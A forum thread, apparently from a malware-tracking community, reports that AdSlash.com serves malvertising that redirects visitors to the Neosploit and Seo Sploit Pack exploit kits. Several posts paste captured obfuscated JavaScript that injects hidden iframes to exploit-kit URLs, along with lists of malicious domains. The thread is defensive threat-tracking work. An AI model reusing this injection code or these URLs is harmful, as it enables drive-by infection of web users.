AdSlash.com is a bogus ad network

[MysteryFCM]

AdSlash.com is a bogus ad network
 

We've seen a number of ads being punted through AdSlash.com to legitimate ad networks, but it appears that these are leading to a PDF Exploit (don't visit these sites, obviously!).

For example:
fwlink.nx7.zedo.com.adslash.com/?alx=a27131939386&td=qcbp71pz=42834&sz=728x90&_zm=359161&st=n1n4&id=131939386&zcw=gh17chl277&xryr=3913771&mp=1460h1
fwlink.nx7.zedo.com.adslash.com/stats_js_e.php?id=131939386
fwlink.nx7.zedo.com.adslash.com/bdb/Health/banner_728.gif
fridayalways.com/kven/index.php
fridayalways.com/kven/js/common.js
fridayalways.com/kven/pdfadmnplay.php
fridayalways.com/kven/files/backoutblack.pdf

or
...

Read more
http://www.dynamoo.com/blog/2010/01/adslashcom-is-bogus-ad-network.html

[SysAdMini]

In the last days I have seen an exploit kit at the same host as fridayalways.com.
Domain name changes daily, sometimes more than once daily. Today I saw uparms.com and sportsbettingaustralia.com.

http://www.malwaredomainlist.com/mdl.php?search=213.108.56.18&colsearch=All&quantity=50&inactive=on

It was always a link at adslash that lead to the exploit kit.

This is the bad url

Code: [Select]

fwlink.nx7.zedo.com.adslash.com/?alx=a27131959519&td=qcbp71pz=42834&sz=120x600&_zm=359161&st=n1n4&id=131959519&zcw=gh17chl277&xryr=3913771&mp=1460h1
Now it directs to the exploit kit at

Code: [Select]

aboutleaving.com/abglde/index.php

[MysteryFCM]

Nice find (not had time to look into this myself yet)

[SysAdMini]

The url doesn't redirect any longer to exploit kit. But I saved a copy of the page from today when it was directing to sportsbettingaustralia. com.

Code: [Select]

<html><body style="margin:0; padding:0;">
<script type="text/javascript">

        statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60);



var cd1 = "fwl";
var cd2 = "ink.nx7.";
var cd3 = "zedo.com.adslash.com";
var cur_domain = cd1 + cd2 + cd3;

        var all_t = "";
        var mtch = all_t.match(statictml);


if ( mtch != null ) {
  document.write(unescape("%3Ciframe src='http://"+cur_domain+"/stats_t.php?id=131959519&s=0&e=1' style='visibility:hidden;' width='0' height='0'  %3E%3C/iframe%3E"));
}  else  {
   
                               

var eu1 = "htt"; var eu2 = "p://spo"; var eu3 = "rtsbettingaustr"; var eu4 = "alia.com/spglde/index.php";
var eu = eu1 + eu2 + eu3 + eu4;

//
var js_e1 = "htt"; var js_e2 = "p://fwl"; var js_e3 = "ink.nx7.zedo.co"; var js_e4 = "m.adslash.com/stats_js_e.php?id=131959519";
var js_e = js_e1 + js_e2 + js_e3 + js_e4;
document.write(unescape("%3Ciframe src='" + js_e + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
//

document.write(unescape("%3Ciframe src='" + eu + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
       

} //!mtch




       //

document.write(unescape("%3Ca href='http%3A%2F%2Fwww.healthbuy.com%2F%3Fidpv%3Dde' target='_blank'%3E%3Cimg src='http://fwlink.nx7.zedo.com.adslash.com/bdb/Health/120x160.gif' border='0' %3E%3C/a%3E"));



</script>


</body></html>


[SysAdMini]

Story continues. Now directing to a Neosploit kit at

Code: [Select]

http://essentiuz.com/ld/trest11/
http://wepawet.cs.ucsb.edu/view.php?hash=d7dd742b0efe8b0b955facf092f6f1d8&t=1264013587&type=js
http://www.virustotal.com/analisis/b0236f5af7958fe116e9dc29ae11deadc37f858f02a3d7915fdff0cbcb1cc8b7-1264012440

Code: [Select]

<html><body style="margin:0; padding:0;">
<script type="text/javascript">

        statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60);



var cd1 = "fwl";
var cd2 = "ink.nx7.";
var cd3 = "zedo.com.adslash.com";
var cur_domain = cd1 + cd2 + cd3;

        var all_t = "";
        var mtch = all_t.match(statictml);


if ( mtch != null ) {
  document.write(unescape("%3Ciframe src='http://"+cur_domain+"/stats_t.php?id=131959519&s=0&e=1' style='visibility:hidden;' width='0' height='0'  %3E%3C/iframe%3E"));
}  else  {
   
                               

var eu1 = "htt"; var eu2 = "p://ess"; var eu3 = "entiuz.com/ld/t"; var eu4 = "rest11/";
var eu = eu1 + eu2 + eu3 + eu4;

//
var js_e1 = "htt"; var js_e2 = "p://fwl"; var js_e3 = "ink.nx7.zedo.co"; var js_e4 = "m.adslash.com/stats_js_e.php?id=131959519";
var js_e = js_e1 + js_e2 + js_e3 + js_e4;
document.write(unescape("%3Ciframe src='" + js_e + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
//

document.write(unescape("%3Ciframe src='" + eu + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
       

} //!mtch




       //

document.write(unescape("%3Ca href='http%3A%2F%2Fwww.healthbuy.com%2F%3Fidpv%3Dde' target='_blank'%3E%3Cimg src='http://fwlink.nx7.zedo.com.adslash.com/bdb/Health/120x160.gif' border='0' %3E%3C/a%3E"));



</script>


</body></html>


[SysAdMini]

No we know the name of the exploit kit:

Seo Sploit Pack

http://www.malwaredomainlist.com/forums/index.php?topic=2207.msg13872#msg13872

[SysAdMini]

Now adslash directs to Seo Sploit Pack at

Code: [Select]

http://aboutstarting.com/abde/index.php

Code: [Select]

    <html><body style="margin:0; padding:0;">
    <script type="text/javascript">
       
        statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60);
   
   
   
    var cd1 = "fwl";
    var cd2 = "ink.nx7.";
    var cd3 = "zedo.com.adslash.com";
    var cur_domain = cd1 + cd2 + cd3;
   
        var all_t = "";
        var mtch = all_t.match(statictml);   
       
   
    if ( mtch != null ) {
       document.write(unescape("%3Ciframe src='http://"+cur_domain+"/stats_t.php?id=131959519&s=0&e=1' style='visibility:hidden;' width='0' height='0'  %3E%3C/iframe%3E"));
    }  else  {
                 
                                         
                 
                  var eu1 = "htt"; var eu2 = "p://abo"; var eu3 = "utstarting.com/"; var eu4 = "abde/index.php";                 
                  var eu = eu1 + eu2 + eu3 + eu4;
                 
                  //               
                                    var js_e1 = "htt"; var js_e2 = "p://fwl"; var js_e3 = "ink.nx7.zedo.co"; var js_e4 = "m.adslash.com/stats_js_e.php?id=131959519";
                  var js_e = js_e1 + js_e2 + js_e3 + js_e4;
                  document.write(unescape("%3Ciframe src='" + js_e + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E")); 
                  //                                 
                 
                  document.write(unescape("%3Ciframe src='" + eu + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));                                   
                   

      } //!mtch     
   
   

       
            //
     
    document.write(unescape("%3Ca href='http%3A%2F%2Fwww.healthbuy.com%2F%3Fidpv%3Dde' target='_blank'%3E%3Cimg src='http://fwlink.nx7.zedo.com.adslash.com/bdb/Health/120x160.gif' border='0' %3E%3C/a%3E"));
       
 

    </script>
   
         
    </body></html>
   

[SysAdMini]

Code: [Select]

aboutadding.com/abtde/index.php

Code: [Select]

<html><body style="margin:0; padding:0;">
<script type="text/javascript">

        statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60);



var cd1 = "fwl";
var cd2 = "ink.nx7.";
var cd3 = "zedo.com.adslash.com";
var cur_domain = cd1 + cd2 + cd3;

        var all_t = "";
        var mtch = all_t.match(statictml);


if ( mtch != null ) {
   document.write(unescape("%3Ciframe src='http://"+cur_domain+"/stats_t.php?id=131959519&s=0&e=1' style='visibility:hidden;' width='0' height='0'  %3E%3C/iframe%3E"));
}  else  {
   
                               

var eu1 = "htt"; var eu2 = "p://abo"; var eu3 = "utadding.com/ab"; var eu4 = "tde/index.php";
var eu = eu1 + eu2 + eu3 + eu4;

//
var js_e1 = "htt"; var js_e2 = "p://fwl"; var js_e3 = "ink.nx7.zedo.co"; var js_e4 = "m.adslash.com/stats_js_e.php?id=131959519";
var js_e = js_e1 + js_e2 + js_e3 + js_e4;
document.write(unescape("%3Ciframe src='" + js_e + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
//

document.write(unescape("%3Ciframe src='" + eu + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
       

} //!mtch




        //

document.write(unescape("%3Ca href='http%3A%2F%2Fwww.healthbuy.com%2F%3Fidpv%3Dde' target='_blank'%3E%3Cimg src='http://fwlink.nx7.zedo.com.adslash.com/bdb/Health/120x160.gif' border='0' %3E%3C/a%3E"));



</script>


</body></html>


[SysAdMini]

Code: [Select]

http://noticeabout.com/ntde/index.php

Code: [Select]

<html><body style="margin:0; padding:0;">
<script type="text/javascript">

        statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60);



var cd1 = "fwl";
var cd2 = "ink.nx7.";
var cd3 = "zedo.com.adslash.com";
var cur_domain = cd1 + cd2 + cd3;

        var all_t = "";
        var mtch = all_t.match(statictml);


if ( mtch != null ) {
   document.write(unescape("%3Ciframe src='http://"+cur_domain+"/stats_t.php?id=131959519&s=0&e=1' style='visibility:hidden;' width='0' height='0'  %3E%3C/iframe%3E"));
}  else  {
   
                               

var eu1 = "htt"; var eu2 = "p://not"; var eu3 = "iceabout.com/nt"; var eu4 = "de/index.php";
var eu = eu1 + eu2 + eu3 + eu4;

//
var js_e1 = "htt"; var js_e2 = "p://fwl"; var js_e3 = "ink.nx7.zedo.co"; var js_e4 = "m.adslash.com/stats_js_e.php?id=131959519";
var js_e = js_e1 + js_e2 + js_e3 + js_e4;
document.write(unescape("%3Ciframe src='" + js_e + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
//

document.write(unescape("%3Ciframe src='" + eu + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
       

} //!mtch




        //

document.write(unescape("%3Ca href='http%3A%2F%2Fwww.healthbuy.com%2F%3Fidpv%3Dde' target='_blank'%3E%3Cimg src='http://fwlink.nx7.zedo.com.adslash.com/bdb/Health/120x160.gif' border='0' %3E%3C/a%3E"));



</script>


</body></html>


[SysAdMini]

Code: [Select]

http://feelingabout.com/flde/index.php

Code: [Select]

<html><body style="margin:0; padding:0;">
<script type="text/javascript">

        statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60);



var cd1 = "fwl";
var cd2 = "ink.nx7.";
var cd3 = "zedo.com.adslash.com";
var cur_domain = cd1 + cd2 + cd3;

        var all_t = "";
        var mtch = all_t.match(statictml);


if ( mtch != null ) {
   document.write(unescape("%3Ciframe src='http://"+cur_domain+"/stats_t.php?id=131959519&s=0&e=1' style='visibility:hidden;' width='0' height='0'  %3E%3C/iframe%3E"));
}  else  {
   
                               

var eu1 = "htt"; var eu2 = "p://fee"; var eu3 = "lingabout.com/f"; var eu4 = "lde/index.php";
var eu = eu1 + eu2 + eu3 + eu4;

//
var js_e1 = "htt"; var js_e2 = "p://fwl"; var js_e3 = "ink.nx7.zedo.co"; var js_e4 = "m.adslash.com/stats_js_e.php?id=131959519";
var js_e = js_e1 + js_e2 + js_e3 + js_e4;
document.write(unescape("%3Ciframe src='" + js_e + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
//

document.write(unescape("%3Ciframe src='" + eu + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
       

} //!mtch




        //

document.write(unescape("%3Ca href='http%3A%2F%2Fwww.healthbuy.com%2F%3Fidpv%3Dde' target='_blank'%3E%3Cimg src='http://fwlink.nx7.zedo.com.adslash.com/bdb/Health/120x160.gif' border='0' %3E%3C/a%3E"));



</script>


</body></html>


[SysAdMini]

Code: [Select]

http://decisabout.com/decide/index.php

Code: [Select]

<html><body style="margin:0; padding:0;">
<script type="text/javascript">

        statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60);



var cd1 = "fwl";
var cd2 = "ink.nx7.";
var cd3 = "zedo.com.adslash.com";
var cur_domain = cd1 + cd2 + cd3;

        var all_t = "";
        var mtch = all_t.match(statictml);


if ( mtch != null ) {
   document.write(unescape("%3Ciframe src='http://"+cur_domain+"/stats_t.php?id=131959519&s=0&e=1' style='visibility:hidden;' width='0' height='0'  %3E%3C/iframe%3E"));
}  else  {
   
                               

var eu1 = "htt"; var eu2 = "p://dec"; var eu3 = "isabout.com/dec"; var eu4 = "ide/index.php";
var eu = eu1 + eu2 + eu3 + eu4;

//
var js_e1 = "htt"; var js_e2 = "p://fwl"; var js_e3 = "ink.nx7.zedo.co"; var js_e4 = "m.adslash.com/stats_js_e.php?id=131959519";
var js_e = js_e1 + js_e2 + js_e3 + js_e4;
document.write(unescape("%3Ciframe src='" + js_e + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
//

document.write(unescape("%3Ciframe src='" + eu + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
       

} //!mtch




        //

document.write(unescape("%3Ca href='http%3A%2F%2Fwww.healthbuy.com%2F%3Fidpv%3Dde' target='_blank'%3E%3Cimg src='http://fwlink.nx7.zedo.com.adslash.com/bdb/Health/120x160.gif' border='0' %3E%3C/a%3E"));



</script>


</body></html>


[SysAdMini]

Code: [Select]

http://aboutexactly.com/boude/index.php

Code: [Select]

<html><body style="margin:0; padding:0;">
<script type="text/javascript">

        statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60);



var cd1 = "fwl";
var cd2 = "ink.nx7.";
var cd3 = "zedo.com.adslash.com";
var cur_domain = cd1 + cd2 + cd3;

        var all_t = "";
        var mtch = all_t.match(statictml);


if ( mtch != null ) {
   document.write(unescape("%3Ciframe src='http://"+cur_domain+"/stats_t.php?id=131959519&s=0&e=1' style='visibility:hidden;' width='0' height='0'  %3E%3C/iframe%3E"));
}  else  {
   
                               

var eu1 = "htt"; var eu2 = "p://abo"; var eu3 = "utexactly.com/b"; var eu4 = "oude/index.php";
var eu = eu1 + eu2 + eu3 + eu4;

//
var js_e1 = "htt"; var js_e2 = "p://fwl"; var js_e3 = "ink.nx7.zedo.co"; var js_e4 = "m.adslash.com/stats_js_e.php?id=131959519";
var js_e = js_e1 + js_e2 + js_e3 + js_e4;
document.write(unescape("%3Ciframe src='" + js_e + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
//

document.write(unescape("%3Ciframe src='" + eu + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
       

} //!mtch




        //

document.write(unescape("%3Ca href='http%3A%2F%2Fwww.healthbuy.com%2F%3Fidpv%3Dde' target='_blank'%3E%3Cimg src='http://fwlink.nx7.zedo.com.adslash.com/bdb/Health/120x160.gif' border='0' %3E%3C/a%3E"));



</script>


</body></html>


[SysAdMini]

Code: [Select]

http://trade-statistics.com/trde/index.php

Code: [Select]

<html><body style="margin:0; padding:0;">
<script type="text/javascript">

        statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60);



var cd1 = "fwl";
var cd2 = "ink.nx7.";
var cd3 = "zedo.com.adslash.com";
var cur_domain = cd1 + cd2 + cd3;

        var all_t = "";
        var mtch = all_t.match(statictml);


if ( mtch != null ) {
   document.write(unescape("%3Ciframe src='http://"+cur_domain+"/stats_t.php?id=131959519&s=0&e=1' style='visibility:hidden;' width='0' height='0'  %3E%3C/iframe%3E"));
}  else  {
   
                               

var eu1 = "htt"; var eu2 = "p://tra"; var eu3 = "de-statistics.c"; var eu4 = "om/trde/index.php";
var eu = eu1 + eu2 + eu3 + eu4;

//
var js_e1 = "htt"; var js_e2 = "p://fwl"; var js_e3 = "ink.nx7.zedo.co"; var js_e4 = "m.adslash.com/stats_js_e.php?id=131959519";
var js_e = js_e1 + js_e2 + js_e3 + js_e4;
document.write(unescape("%3Ciframe src='" + js_e + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
//

document.write(unescape("%3Ciframe src='" + eu + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
       

} //!mtch




        //

document.write(unescape("%3Ca href='http%3A%2F%2Fwww.healthbuy.com%2F%3Fidpv%3Dde' target='_blank'%3E%3Cimg src='http://fwlink.nx7.zedo.com.adslash.com/bdb/Health/120x160.gif' border='0' %3E%3C/a%3E"));



</script>


</body></html>


[SysAdMini]

Code: [Select]

google.com.analytics.kdgsrltkcun.com/nte/trest11

Code: [Select]

<html><body style="margin:0; padding:0;">
<script type="text/javascript">

        statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60);



var cd1 = "fwl";
var cd2 = "ink.nx7.";
var cd3 = "zedo.com.adslash.com";
var cur_domain = cd1 + cd2 + cd3;

        var all_t = "";
        var mtch = all_t.match(statictml);


if ( mtch != null ) {
   document.write(unescape("%3Ciframe src='http://"+cur_domain+"/stats_t.php?id=131959519&s=0&e=1' style='visibility:hidden;' width='0' height='0'  %3E%3C/iframe%3E"));
}  else  {
   
                               

var eu1 = "htt"; var eu2 = "p://goo"; var eu3 = "gle.com.analyti"; var eu4 = "cs.kdgsrltkcun.com/nte/trest11";
var eu = eu1 + eu2 + eu3 + eu4;

//
var js_e1 = "htt"; var js_e2 = "p://fwl"; var js_e3 = "ink.nx7.zedo.co"; var js_e4 = "m.adslash.com/stats_js_e.php?id=131959519";
var js_e = js_e1 + js_e2 + js_e3 + js_e4;
document.write(unescape("%3Ciframe src='" + js_e + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
//

document.write(unescape("%3Ciframe src='" + eu + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
       

} //!mtch




        //

document.write(unescape("%3Ca href='http%3A%2F%2Fwww.healthbuy.com%2F%3Fidpv%3Dde' target='_blank'%3E%3Cimg src='http://fwlink.nx7.zedo.com.adslash.com/bdb/Health/120x160.gif' border='0' %3E%3C/a%3E"));



</script>


</body></html>


[SysAdMini]

Code: [Select]

http://macromedia-update.com/matde/index.php

Code: [Select]

<html><body style="margin:0; padding:0;">
<script type="text/javascript">

        statictml = (new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0) - new Date(new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().substring(0, new Date(new Date().getFullYear(), 0, 1, 0, 0, 0, 0).toGMTString().lastIndexOf(" ")-1))) / (1000 * 60 * 60);



var cd1 = "fwl";
var cd2 = "ink.nx7.";
var cd3 = "zedo.com.adslash.com";
var cur_domain = cd1 + cd2 + cd3;

        var all_t = "";
        var mtch = all_t.match(statictml);


if ( mtch != null ) {
   document.write(unescape("%3Ciframe src='http://"+cur_domain+"/stats_t.php?id=131959519&s=0&e=1' style='visibility:hidden;' width='0' height='0'  %3E%3C/iframe%3E"));
}  else  {
   
                               

var eu1 = "htt"; var eu2 = "p://mac"; var eu3 = "romedia-update."; var eu4 = "com/matde/index.php";
var eu = eu1 + eu2 + eu3 + eu4;

//
var js_e1 = "htt"; var js_e2 = "p://fwl"; var js_e3 = "ink.nx7.zedo.co"; var js_e4 = "m.adslash.com/stats_js_e.php?id=131959519";
var js_e = js_e1 + js_e2 + js_e3 + js_e4;
document.write(unescape("%3Ciframe src='" + js_e + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
//

document.write(unescape("%3Ciframe src='" + eu + "' style='visibility:hidden;' width='1' height='1' %3E%3C/iframe%3E"));
       

} //!mtch




        //

document.write(unescape("%3Ca href='http%3A%2F%2Fwww.healthbuy.com%2F%3Fidpv%3Dde' target='_blank'%3E%3Cimg src='http://fwlink.nx7.zedo.com.adslash.com/bdb/Health/120x160.gif' border='0' %3E%3C/a%3E"));



</script>


</body></html>